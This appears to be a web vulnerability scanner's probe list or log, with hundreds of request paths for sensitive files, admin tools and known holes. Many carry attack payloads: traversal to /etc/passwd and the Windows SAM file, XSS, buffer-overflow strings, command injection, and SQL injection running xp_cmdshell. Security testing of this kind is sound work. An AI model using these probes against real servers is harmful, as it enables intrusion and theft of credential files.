/icons/small/changes.xml
/icons/small/changs.txt
/icons/small/cleanup.log
/icons/small/cleanup.txt
/icons/small/clients.htx
/icons/small/code.php
/icons/small/code.php3
/icons/small/common.inc
/icons/small/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
/icons/small/config.inc
/icons/small/configuration.inc
/icons/small/configure
/icons/small/CONFIGURE.txt
/icons/small/connect.asp?server=%3Cscript%3Ealert%2827042%29%3C%2Fscript%3E
/icons/small/connect.inc
/icons/small/connection.inc
/icons/small/content-space
/icons/small/COPYRIGHT.txt
/icons/small/core
/icons/small/counter.exe?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/icons/small/CreatedByHP3
/icons/small/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
/icons/small/customer.dbf
/icons/small/customers.dbf
/icons/small/CVS/
/icons/small/CVS/Entries
/icons/small/CVS/Repository
/icons/small/CVS/Root
/icons/small/dasp/fm_shell.asp
/icons/small/data.dbf
/icons/small/data.htm
/icons/small/data.html
/icons/small/data.txt
/icons/small/database.inc
/icons/small/datafunc.inc
/icons/small/db.dbf
/icons/small/db.inc
/icons/small/dbconfig.inc
/icons/small/dbconn.inc
/icons/small/dbsamp.htm
/icons/small/debug.asp
/icons/small/debug.cfg
/icons/small/debug.cgi
/icons/small/debug.dat
/icons/small/debug.htm
/icons/small/debug.html
/icons/small/debug.inc
/icons/small/debug.php
/icons/small/debug.php3
/icons/small/debug.pl
/icons/small/debug.txt
/icons/small/Default.asp
/icons/small/Default.aspx
/icons/small/deploy.exe
/icons/small/dir.txt
/icons/small/directory.php?dir=%3Bcat%20/etc/passwd
/icons/small/DirectoryListing.asp
/icons/small/dirs.txt
/icons/small/doexec.c
/icons/small/download.html
/icons/small/dvwssr.dll
/icons/small/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name=%20;id;%20
/icons/small/EDM-ViewController-context-root/browse.do?act=%3CSCRIPT%3Ealert(xss);%3C/SCRIPT%3E&amp;select=1177281
/icons/small/email.txt
/icons/small/email_list.txt
/icons/small/email_template.txt
/icons/small/env.log
/icons/small/error.log
/icons/small/errors.log
/icons/small/errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
/icons/small/errors_log
/icons/small/error_log
/icons/small/examples/jsp/cal/cal2.jsp?time=8am%3cscript%3ealert(xss)%3c%2fscript%3e
/icons/small/examples/SendMailServlet
/icons/small/examples/servlet/SnoopServlet
/icons/small/examples/servlet/TroubleShooter
/icons/small/exchange/forms/ipm/note/cmpTitle.asp?tab=%22%2Balert%2826884%29%3B%7D%20setImportance%281%29%3B%3C%2Fscript%3E&att=0&imp=1
/icons/small/formprocessor.asp?MailTo=test@test.com&MailFrom=test@test.net&Message=tst&MailTemplate1=/cgi-bin/formprocessor.asp
/icons/small/forums/list.php?f=DESIRED_PHP_FILE_WITHOUT_EXTENSION
/icons/small/fuck.exe
/icons/small/functions.inc
/icons/small/gallery.php
/icons/small/GetFile.cfm
/icons/small/global.asa+.htr
/icons/small/global.asax+.htr
/icons/small/global.asax\
/icons/small/global.asa\
/icons/small/global.inc
/icons/small/globals.jsa
/icons/small/gnujsp/[dirname]/[file]
/icons/small/groupcp.php
/icons/small/hobbit.txt
/icons/small/Hosting/sqlbrowse.asp?filepath=c:\&Opt=3
/icons/small/HostingController/sqlbrowse.asp?filepath=c:\&Opt=3
/icons/small/iisadmin
/icons/small/iisadmin/bdir.htr
/icons/small/iisadmin/bdir.htr??c:\
/icons/small/iisadmin/bdir.htr?dir=ht??c:\
/icons/small/iisadmin/default.htm
/icons/small/iisadmin/ism.dll?http/dir
/icons/small/iisadmin/samples/ctgestb.htx
/icons/small/iisadmin/samples/ctgestb.idc
/icons/small/iisadmin/samples/details.htx
/icons/small/iisadmin/samples/details.idc
/icons/small/iisadmin/samples/query.htx
/icons/small/iisadmin/samples/query.idc
/icons/small/iisadmin/samples/register.htx
/icons/small/iisadmin/samples/register.idc
/icons/small/iisadmin/samples/sample.htx
/icons/small/iisadmin/samples/sample.idc
/icons/small/iisadmin/samples/sample2.htx
/icons/small/iisadmin/samples/sample2.idc
/icons/small/iisadmin/samples/viewbook.htx
/icons/small/iisadmin/samples/viewbook.idc
/icons/small/iisadmin/tools
/icons/small/iisadmin/tools/ct.htx
/icons/small/iisadmin/tools/ctss.idc
/icons/small/iisadmin/tools/dsnform.exe
/icons/small/iisadmin/tools/getdrvrs.exe
/icons/small/iisadmin/tools/mkilog.exe
/icons/small/iisadmin/tools/newdsn.exe
/icons/small/iisadminbdir.htr
/icons/small/IISADMPWD
/icons/small/iissamples/exair/howitworks/codebrws.asp?source=/msadc/../../../../../boot.ini
/icons/small/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/iissamples/sdk/asp/docs/%c0%ae./%c0%ae./%c0%ae./%c0%ae./%c0%ae./%c0%ae./winnt/win.ini%c0%80.asp
/icons/small/iissamples/sdk/asp/interaction/ServerVariables_Jscript.asp
/icons/small/include.inc
/icons/small/includes/functions/pmwh.php
/icons/small/index.js0x70
/icons/small/index.php3?vhosts=http://go.to
/icons/small/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc%2Fpasswd
/icons/small/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
/icons/small/info.txt
/icons/small/info2.txt
/icons/small/install
/icons/small/install.htm
/icons/small/INSTALL.html
/icons/small/install.log
/icons/small/INSTALL.mysql.txt
/icons/small/INSTALL.pgsql.txt
/icons/small/install.txt
/icons/small/install.xml
/icons/small/intranet.html
/icons/small/inventory.dbf
/icons/small/ipswitch.ini
/icons/small/issadmin/bdir.htr
/icons/small/LICENSE.txt
/icons/small/localstart.asp
/icons/small/log.asp
/icons/small/log.cgi
/icons/small/log.htm
/icons/small/log.html
/icons/small/log.php
/icons/small/login.asp
/icons/small/Login.aspx
/icons/small/login.dbf
/icons/small/Login.do
/icons/small/login.htx
/icons/small/login.php
/icons/small/logon.cgi
/icons/small/logon.htm
/icons/small/logon.html
/icons/small/logon.pl
/icons/small/logs.asp
/icons/small/logs.cgi
/icons/small/logs.htm
/icons/small/logs.html
/icons/small/logs.php
/icons/small/maintainers.txt
/icons/small/Makefile
/icons/small/members.dbf
/icons/small/mkilog.exe
/icons/small/mlog.phtml
/icons/small/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
/icons/small/msadc/msadcs.dll
/icons/small/msadc/Samples/Selector/ShowCode.asp?source=/msadc/../../../../../boot.ini
/icons/small/nc.exe
/icons/small/netcat
/icons/small/netcat.c
/icons/small/netcat.exe
/icons/small/nonExistentPage.asp
/icons/small/nonExistentPage.aspx
/icons/small/nonExistentPage.cfm
/icons/small/nonExistentPage.cgi
/icons/small/nonExistentPage.html
/icons/small/nonExistentPage.jhtml
/icons/small/nonExistentPage.jsp
/icons/small/nonExistentPage.msp
/icons/small/nonExistentPage.nsf
/icons/small/nonExistentPage.php
/icons/small/nonExistentPage.php3
/icons/small/nonExistentPage.php4
/icons/small/nonExistentPage.pl
/icons/small/nonExistentPage.shtml
/icons/small/Northwind?sql=SELECT+contactname,+phone+FROM+Customers+FOR+XML&root=<script>alert(xss)</script>
/icons/small/nph-test-cgi
/icons/small/NR/System/Access/ManualLogin.asp?REASONTXT=<script>alert(xss)</script>
/icons/small/ntdaddy.asp
/icons/small/null.htw?CiWebHitsFile=/default.htm&CiRestriction="<script>alert(xss)</script>"
/icons/small/null.htw?CiWebHitsFile=/global.asa%20&CiRestriction=none&CiHiliteType=Full
/icons/small/null.htw?CiWebHitsFile=/global.asax%20&CiRestriction=none&CiHiliteType=Full
/icons/small/null.htw?CiWebHitsFile=/index.htm&CiRestriction="<script>alert(xss)</script>"
/icons/small/null.htw?CiWebHitsFile=/index.html&CiRestriction="<script>alert(xss)</script>"
/icons/small/ora_errs.log
/icons/small/order.htm
/icons/small/order.html
/icons/small/order.txt
/icons/small/orders.asp
/icons/small/orders.dat
/icons/small/orders.htm
/icons/small/orders.html
/icons/small/orders.txt
/icons/small/Output-Build.txt
/icons/small/owalogon.asp
/icons/small/owa_util.listprint
/icons/small/owa_util.listprint?p_theQuery=SELECT%20*%20FROM%20SYS.TAB&p_cname=&p_nsize=
/icons/small/owa_util.showsource
/icons/small/owa_util.show_query_columns
/icons/small/owa_util.signature
/icons/small/page.cfm
/icons/small/pass.asp
/icons/small/pass.cfg
/icons/small/pass.cgi
/icons/small/pass.dat
/icons/small/pass.data
/icons/small/pass.db
/icons/small/pass.dbf
/icons/small/pass.exe
/icons/small/pass.htm
/icons/small/pass.html
/icons/small/pass.htx
/icons/small/pass.ini
/icons/small/pass.lst
/icons/small/pass.pl
/icons/small/pass.txt
/icons/small/pass/clients.htx
/icons/small/pass/pass.htx
/icons/small/pass/password.htx
/icons/small/pass/passwords.htx
/icons/small/pass/users.htx
/icons/small/passwd
/icons/small/passwd.txt
/icons/small/password
/icons/small/password.asp
/icons/small/password.cfg
/icons/small/password.cgi
/icons/small/password.dat
/icons/small/password.data
/icons/small/password.db
/icons/small/password.dbf
/icons/small/password.exe
/icons/small/password.htm
/icons/small/password.html
/icons/small/password.htx
/icons/small/password.ini
/icons/small/password.lst
/icons/small/password.pl
/icons/small/password.txt
/icons/small/passwords.asp
/icons/small/passwords.cfg
/icons/small/passwords.cgi
/icons/small/passwords.dat
/icons/small/passwords.data
/icons/small/passwords.db
/icons/small/passwords.dbf
/icons/small/passwords.exe
/icons/small/passwords.htm
/icons/small/passwords.html
/icons/small/passwords.htx
/icons/small/passwords.ini
/icons/small/passwords.lst
/icons/small/passwords.php3
/icons/small/passwords.pl
/icons/small/passwords.txt
/icons/small/pbserver/pbserver.dll?&&&&&&pb=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/icons/small/persists/Test11.asp
/icons/small/php.exe?c:\boot.ini
/icons/small/php.exe?c:\winnt\repair\sam
/icons/small/php/mlog.phtml
/icons/small/php/mylog.phtml
/icons/small/php/php.exe?c:\boot.ini
/icons/small/php/php.exe?c:\winnt\repair\sam
/icons/small/php3/php.exe?c:\boot.ini
/icons/small/php3/php.exe?c:\winnt\repair\sam
/icons/small/php4/php.exe?c:\boot.ini
/icons/small/php4/php.exe?c:\winnt\repair\sam
/icons/small/phpmyadmin/sql.php3?server=000&cfgServers[000][host]=hello&btnDrop=No&goto=/etc/passwd
/icons/small/phpmyadmin/sql.php?server=000&cfgServers[000][host]=hello&btnDrop=No&goto=/etc/passwd
/icons/small/postinfo.asp
/icons/small/prn.nsf
/icons/small/products.dbf
/icons/small/profile.php?mode=editprofile
/icons/small/pubs.dbf
/icons/small/query.idq?CiTemplate=query.idq
/icons/small/query.idq?CiTemplate=query.idq%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
/icons/small/query.inc
/icons/small/RCS/
/icons/small/Readme
/icons/small/README.htm
/icons/small/README.html
/icons/small/ReadMe.txt
/icons/small/register.htm
/icons/small/register.html
/icons/small/register.txt
/icons/small/registration.htm
/icons/small/registration.html
/icons/small/registration.txt
/icons/small/registrations.htm
/icons/small/registrations.html
/icons/small/registrations.txt
/icons/small/repost.asp
/icons/small/robots.txt
/icons/small/root.exe
/icons/small/samples/asp/viewcode.asp?file=index.asp
/icons/small/samples/ctguestb.idc
/icons/small/samples/ctguestbook.idc
/icons/small/samples/details.idq
/icons/small/samples/search/author.idq
/icons/small/samples/search/filesize.idq
/icons/small/samples/search/filetime.idq
/icons/small/samples/search/qfullhit.htw?ciwebhitsfile=/../../../../boot.ini&cirestriction=none&cihilitetype=full
/icons/small/samples/search/qsumrhit.htw?ciwebhitsfile=/../../../../boot.ini&cirestriction=none&cihilitetype=full
/icons/small/samples/search/query.idq
/icons/small/samples/search/queryhit.idq?CiRestriction=%23FILENAME%3D*.pwd&CiMaxRecordsPerPage=10&CiScope=%2F&TemplateName=queryhit&CiSort=rank%5Bd%5D&HTMLQueryForm=%2Fsamples%2Fsearch%2Fqueryhit.htm
/icons/small/samples/search/queryhit.idq?CiRestriction=%23FILENAME%3D*.pwl&CiMaxRecordsPerPage=10&CiScope=%2F&TemplateName=queryhit&CiSort=rank%5Bd%5D&HTMLQueryForm=%2Fsamples%2Fsearch%2Fqueryhit.htm
/icons/small/samples/search/simple.idq
/icons/small/samples/search/webhits.exe
/icons/small/samples/Test11.asp
/icons/small/scripts/comments.txt
/icons/small/scripts/iisadmin/bdir.htr
/icons/small/security.dbf
/icons/small/SELECT%09'aa'%09FROM%09TAB
/icons/small/sendmail.inc
/icons/small/server.log
/icons/small/servervar.asp
/icons/small/servervariables.asp
/icons/small/servervariables_vbscript.asp
/icons/small/servervars.asp
/icons/small/services
/icons/small/servlet
/icons/small/shop$db.asp
/icons/small/showfile.asp
/icons/small/sitelist.txt
/icons/small/sitemap.gz
/icons/small/sitemap.xml
/icons/small/sitemap.xml.gz
/icons/small/sitestat.asp
/icons/small/sitestat.cgi
/icons/small/sitestat.htm
/icons/small/sitestat.html
/icons/small/sitestat.php
/icons/small/sitestats.asp
/icons/small/sitestats.cgi
/icons/small/sitestats.htm
/icons/small/sitestats.html
/icons/small/sitestats.php
/icons/small/site_mgmt.htm
/icons/small/site_mgmt.html
/icons/small/small.ace
/icons/small/small.arj
/icons/small/small.gz
/icons/small/small.lha
/icons/small/small.lzh
/icons/small/small.rar
/icons/small/small.sln
/icons/small/small.tar
/icons/small/small.zip
/icons/small/source.asp
/icons/small/sql.inc
/icons/small/sql.php3?server=000&cfgServers[000][host]=hello&btnDrop=No&goto=/etc/passwd
/icons/small/sql.php?LIB_INC=1&btnDrop=No&goto=/etc/passwd
/icons/small/sql.php?server=000&cfgServers[000][host]=hello&btnDrop=No&goto=/etc/passwd
/icons/small/sqlbrowse.asp?filepath=c:\&Opt=3
/icons/small/sqlconnect.inc
/icons/small/sqlnet.log
/icons/small/sqlnet.trc
/icons/small/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
/icons/small/srchadm/admin.idq
/icons/small/srchadm/webhits.exe
/icons/small/ssl_error.log
/icons/small/ssl_error_log
/icons/small/sso.login.controller
/icons/small/standard.inc
/icons/small/stat.asp
/icons/small/stat.cgi
/icons/small/stat.htm
/icons/small/stat.html
/icons/small/stat.php
/icons/small/stat/
/icons/small/statistics.asp
/icons/small/statistics.cgi
/icons/small/statistics.htm
/icons/small/statistics.html
/icons/small/statistics.php
/icons/small/stats.asp
/icons/small/stats.cgi
/icons/small/stats.htm
/icons/small/stats.html
/icons/small/stats.php
/icons/small/stats/
/icons/small/stats/statsbrowse.asp?filepath=c:\&Opt=3
/icons/small/struts-virtdir/<script>alert(xss)</script>.do
/icons/small/support/common.php
/icons/small/SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../../../../../etc/passwd
/icons/small/test
/icons/small/test-cgi
/icons/small/test-cgi.tcl
/icons/small/test-env
/icons/small/test.asp
/icons/small/test.aspx
/icons/small/test.bat
/icons/small/test.cfm
/icons/small/test.cgi
/icons/small/test.dbf
/icons/small/test.exe
/icons/small/test.htm
/icons/small/test.html
/icons/small/test.jsp
/icons/small/test.php
/icons/small/test.php3
/icons/small/test.pl
/icons/small/test.shtml
/icons/small/test.txt
/icons/small/Test11.asp
/icons/small/testing.asp
/icons/small/testing.cgi
/icons/small/testing.htm
/icons/small/testing.html
/icons/small/testing.txt
/icons/small/test_page5823.html
/icons/small/tmp
/icons/small/ToDo
/icons/small/TODO.txt
/icons/small/tools/ct.htx
/icons/small/tools/ct.idc
/icons/small/tools/ctss.htx
/icons/small/tools/ctss.idc?ds=LocalServer&user=sa&pwd=&table=ngt(ng%20int);EXEC+master..xp_cmdshell("cmd.exe+/c%20dir");--
/icons/small/tools/details.idc
/icons/small/tools/dnsform.exe
/icons/small/tools/dsn.exe
/icons/small/tools/dsnform.exe
/icons/small/tools/getdrvrs.exe
/icons/small/tools/getdrvs.exe
/icons/small/tools/log.exe
/icons/small/tools/logs.exe
/icons/small/tools/mkilog.exe
/icons/small/tools/mkplog.exe
/icons/small/tools/newdns.exe
/icons/small/tools/newdsn.exe%3fdriver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Web%20SQL&dbq=c:\web.mdb&newdb=CREATE_DB&attr=
/icons/small/trace.axd
/icons/small/update.htm
/icons/small/update.html
/icons/small/upgrade.txt
/icons/small/upload.asp
/icons/small/uploadn.asp
/icons/small/UploadScript11.asp
/icons/small/uploadx.asp
/icons/small/usage.asp
/icons/small/usage.cgi
/icons/small/usage.htm
/icons/small/usage.html
/icons/small/usage.php
/icons/small/usage/
/icons/small/usage_200809.htm
/icons/small/usage_200809.html
/icons/small/usage_200810.htm
/icons/small/usage_200810.html
/icons/small/user.asp
/icons/small/user.cfg
/icons/small/user.cgi
/icons/small/user.dat
/icons/small/user.data
/icons/small/user.db
/icons/small/user.dbf
/icons/small/user.exe
/icons/small/user.htm
/icons/small/user.html
/icons/small/user.htx
/icons/small/user.ini
/icons/small/user.lst
/icons/small/user.pl
/icons/small/user.txt
/icons/small/users.asp
/icons/small/users.cfg
/icons/small/users.cgi
/icons/small/users.dat
/icons/small/users.data
/icons/small/users.db
/icons/small/users.dbf
/icons/small/users.exe
/icons/small/users.htm
/icons/small/users.html
/icons/small/users.htx
/icons/small/users.ini
/icons/small/users.lst
/icons/small/users.pl
/icons/small/users.txt
/icons/small/users/admins.htx
/icons/small/users/clients.htx
/icons/small/users/pass.htx
/icons/small/users/password.htx
/icons/small/users/passwords.htx
/icons/small/user_adm.html
/icons/small/user_info.php3?user_username=''+or+admin_level=2+or+username%3d'x'+and+users.id=access.user_id;%00
/icons/small/utils.inc
/icons/small/validate.inc
/icons/small/viewcode.asp?file=index.asp
/icons/small/ViewCode.asp?source=/../../../../../../boot.ini
/icons/small/wdir.txt
/icons/small/wdirs.txt
/icons/small/WEB-INF./web.xml
/icons/small/WEB-INF/web.xml
/icons/small/webauthor.htm
/icons/small/webplus.exe?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/icons/small/webstats.asp
/icons/small/webstats.cgi
/icons/small/webstats.html
/icons/small/webstats.php
/icons/small/WFDir12667/
/icons/small/Winmsdp.exe?source=/../../../../../../boot.ini
/icons/small/WS_FTP.ini
/icons/small/WS_FTP.LOG
/icons/small/wwwstat.asp
/icons/small/wwwstat.php3
/icons/small/wwwstats.asp
/icons/small/wwwstats.cgi
/icons/small/wwwstats.htm
/icons/small/wwwstats.html
/icons/small/wwwstats.php
/icons/small/wwwstats.txt
/icons/small/wwwstats/
/icons/small/www_stats/
/icons/small/xferlog.txt
/icons/small/_root_.sys
/icons/small/_vti_bin/shtml.dll
